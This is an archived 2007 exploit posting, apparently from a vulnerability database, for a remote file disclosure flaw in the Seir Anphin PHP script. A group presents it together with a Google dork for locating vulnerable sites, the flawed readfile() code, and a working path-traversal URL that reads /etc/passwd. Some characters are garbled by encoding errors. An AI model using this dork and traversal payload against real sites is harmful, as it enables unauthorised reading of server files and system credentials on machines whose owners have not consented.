Lucene search
SecurityvulnsSECURITYVULNS:DOC:16883HistoryApr 29, 2007 - 12:00 a.m.
Seir Anphin (file.php a[filepath]) Remote File Disclosure Vulnerability
2007-04-2900:00:00
vulners.com
7
AYYILDIZ.ORG PreSentsβ¦
Script: Seir Anphin
Script Download: http://www.anphin.com/index.php?m=file&op=download&id=1
Dork:"Powered by Seir Anphin"
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
info: /Siz Yokken AYYILDIZ Vardi./
Bug:
exit();
header("Content-Disposition: attachment; filename=\"$filename\"");
header('Content-Length: ' . filesize($a['filepath']));
readfile($a['filepath']);
exit();
Exploit: [Seir_Anphin_Path]/modules/file.php?a[filepath]=β¦/β¦/β¦/etc/passwd
Tnx:H0tturk,Dr.Max Virus,Gencnesil,Str0ke
Special Tnx: AYYILDIZ.ORG